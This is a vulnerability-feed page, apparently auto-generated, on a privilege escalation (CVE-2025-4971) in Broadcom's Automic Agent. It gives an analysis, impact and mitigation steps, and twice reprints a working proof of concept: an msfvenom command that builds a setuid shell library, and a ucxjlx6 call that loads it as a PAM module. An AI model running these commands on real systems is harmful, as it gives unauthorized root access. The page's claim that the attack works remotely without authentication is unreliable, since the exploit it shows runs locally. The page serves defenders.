Automic Agent 24.3.0 HF4 - Privilege Escalation
Automic Agent 24.3.0 HF4 - Privilege Escalation
AI Analysis
Technical Summary
The security threat concerns a privilege escalation vulnerability in Automic Agent versions prior to 24.3.0 HF4 and 21.0.13 HF1, identified as CVE-2025-4971. Automic Agent is a widely used automation software product from Broadcom, designed to manage and automate IT processes across enterprise environments. The vulnerability allows an attacker to escalate privileges on a Linux system where the vulnerable Automic Agent is installed. The exploit leverages the ability to execute a crafted shared object (.so) file with elevated privileges by manipulating the agent's configuration parameters. Specifically, the attacker generates a malicious shared object using msfvenom that executes a shell with setuid and setgid privileges, then runs the vulnerable 'ucxjlx6' executable with a custom initialization file that points to the malicious shared object as a PAM (Pluggable Authentication Module) library. This results in the execution of arbitrary code with elevated privileges, effectively granting root-level access on the affected system. The exploit does not require authentication and can be executed remotely if the attacker has access to run the 'ucxjlx6' executable or can influence its parameters. The vulnerability impacts the confidentiality, integrity, and availability of the affected systems, as attackers can gain full control, potentially leading to data theft, system manipulation, or denial of service. Although no known exploits are reported in the wild yet, the presence of public exploit code increases the risk of exploitation by malicious actors. The vulnerability affects Linux environments where Automic Agent is deployed, which are common in enterprise IT infrastructures for process automation and job scheduling.
Potential Impact
For European organizations, this vulnerability poses a significant risk due to the widespread use of Automic Agent in enterprise automation and IT operations. Successful exploitation can lead to complete system compromise, allowing attackers to access sensitive data, disrupt critical business processes, and move laterally within networks. This can result in operational downtime, financial losses, regulatory non-compliance (especially under GDPR), and reputational damage. Organizations in sectors such as finance, manufacturing, telecommunications, and government, which heavily rely on automation tools, are particularly vulnerable. The ability to escalate privileges without authentication and the availability of exploit code lowers the barrier for attackers, increasing the likelihood of targeted attacks or opportunistic exploitation. Additionally, the integration of Automic Agent in complex IT environments means that a compromise could cascade, affecting multiple systems and services across an organization.
Mitigation Recommendations
1. Immediate application of vendor patches or updates once available is critical, even though no patch links are currently provided. Engage with Broadcom support to obtain interim fixes or guidance. 2. Restrict access to the 'ucxjlx6' executable and related Automic Agent components using strict file permissions and access control lists to limit who can execute or modify these files. 3. Implement application whitelisting and execution control to prevent unauthorized execution of binaries and shared objects. 4. Monitor and audit usage of the Automic Agent executables and configuration files for unusual or unauthorized changes, especially focusing on PAM configuration and shared object loading. 5. Employ network segmentation to isolate systems running Automic Agent, reducing the attack surface and limiting lateral movement opportunities. 6. Use intrusion detection and prevention systems (IDS/IPS) to detect exploitation attempts, including monitoring for execution of msfvenom-generated payloads or unusual process invocations. 7. Educate system administrators and security teams about this specific vulnerability and the associated exploit techniques to improve detection and response capabilities. 8. Consider deploying runtime application self-protection (RASP) or endpoint detection and response (EDR) solutions that can detect and block privilege escalation attempts in real-time.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain
Indicators of Compromise
- exploit-code: # Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation # Date: 26.05.2025 # Exploit Author: Flora Schäfer # Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation # Version: <24.3.0 HF4, <21.0.13 HF1 # Tested on: Linux # CVE : CVE-2025-4971 1. Generate shared object file using msfvenom $ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so 2. Run the ucxjlx6 executable as follows $ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
Automic Agent 24.3.0 HF4 - Privilege Escalation
Description
Automic Agent 24.3.0 HF4 - Privilege Escalation
AI-Powered Analysis
Technical Analysis
The security threat concerns a privilege escalation vulnerability in Automic Agent versions prior to 24.3.0 HF4 and 21.0.13 HF1, identified as CVE-2025-4971. Automic Agent is a widely used automation software product from Broadcom, designed to manage and automate IT processes across enterprise environments. The vulnerability allows an attacker to escalate privileges on a Linux system where the vulnerable Automic Agent is installed. The exploit leverages the ability to execute a crafted shared object (.so) file with elevated privileges by manipulating the agent's configuration parameters. Specifically, the attacker generates a malicious shared object using msfvenom that executes a shell with setuid and setgid privileges, then runs the vulnerable 'ucxjlx6' executable with a custom initialization file that points to the malicious shared object as a PAM (Pluggable Authentication Module) library. This results in the execution of arbitrary code with elevated privileges, effectively granting root-level access on the affected system. The exploit does not require authentication and can be executed remotely if the attacker has access to run the 'ucxjlx6' executable or can influence its parameters. The vulnerability impacts the confidentiality, integrity, and availability of the affected systems, as attackers can gain full control, potentially leading to data theft, system manipulation, or denial of service. Although no known exploits are reported in the wild yet, the presence of public exploit code increases the risk of exploitation by malicious actors. The vulnerability affects Linux environments where Automic Agent is deployed, which are common in enterprise IT infrastructures for process automation and job scheduling.
Potential Impact
For European organizations, this vulnerability poses a significant risk due to the widespread use of Automic Agent in enterprise automation and IT operations. Successful exploitation can lead to complete system compromise, allowing attackers to access sensitive data, disrupt critical business processes, and move laterally within networks. This can result in operational downtime, financial losses, regulatory non-compliance (especially under GDPR), and reputational damage. Organizations in sectors such as finance, manufacturing, telecommunications, and government, which heavily rely on automation tools, are particularly vulnerable. The ability to escalate privileges without authentication and the availability of exploit code lowers the barrier for attackers, increasing the likelihood of targeted attacks or opportunistic exploitation. Additionally, the integration of Automic Agent in complex IT environments means that a compromise could cascade, affecting multiple systems and services across an organization.
Mitigation Recommendations
1. Immediate application of vendor patches or updates once available is critical, even though no patch links are currently provided. Engage with Broadcom support to obtain interim fixes or guidance. 2. Restrict access to the 'ucxjlx6' executable and related Automic Agent components using strict file permissions and access control lists to limit who can execute or modify these files. 3. Implement application whitelisting and execution control to prevent unauthorized execution of binaries and shared objects. 4. Monitor and audit usage of the Automic Agent executables and configuration files for unusual or unauthorized changes, especially focusing on PAM configuration and shared object loading. 5. Employ network segmentation to isolate systems running Automic Agent, reducing the attack surface and limiting lateral movement opportunities. 6. Use intrusion detection and prevention systems (IDS/IPS) to detect exploitation attempts, including monitoring for execution of msfvenom-generated payloads or unusual process invocations. 7. Educate system administrators and security teams about this specific vulnerability and the associated exploit techniques to improve detection and response capabilities. 8. Consider deploying runtime application self-protection (RASP) or endpoint detection and response (EDR) solutions that can detect and block privilege escalation attempts in real-time.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52309
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for Automic Agent 24.3.0 HF4 - Privilege Escalation
# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation # Date: 26.05.2025 # Exploit Author: Flora Schäfer # Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation # Version: <24.3.0 HF4, <21.0.13 HF1 # Tested on: Linux # CVE : CVE-2025-4971 1. Generate shared object file using msfvenom $ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so 2. Run the ucxjlx6 executable as follows $ ./ucxjlx6 ini=<(ec... (144 more characters)
Threat ID: 68489d847e6d765d51d52748
Added to database: 6/10/2025, 9:03:00 PM
Last enriched: 6/11/2025, 8:11:30 AM
Last updated: 8/4/2025, 9:00:26 PM
Views: 24
Related Threats
U.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumCisco ISE 3.0 - Remote Code Execution (RCE)
CriticalCisco ISE 3.0 - Authorization Bypass
Mediumprojectworlds Online Admission System 1.0 - SQL Injection
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.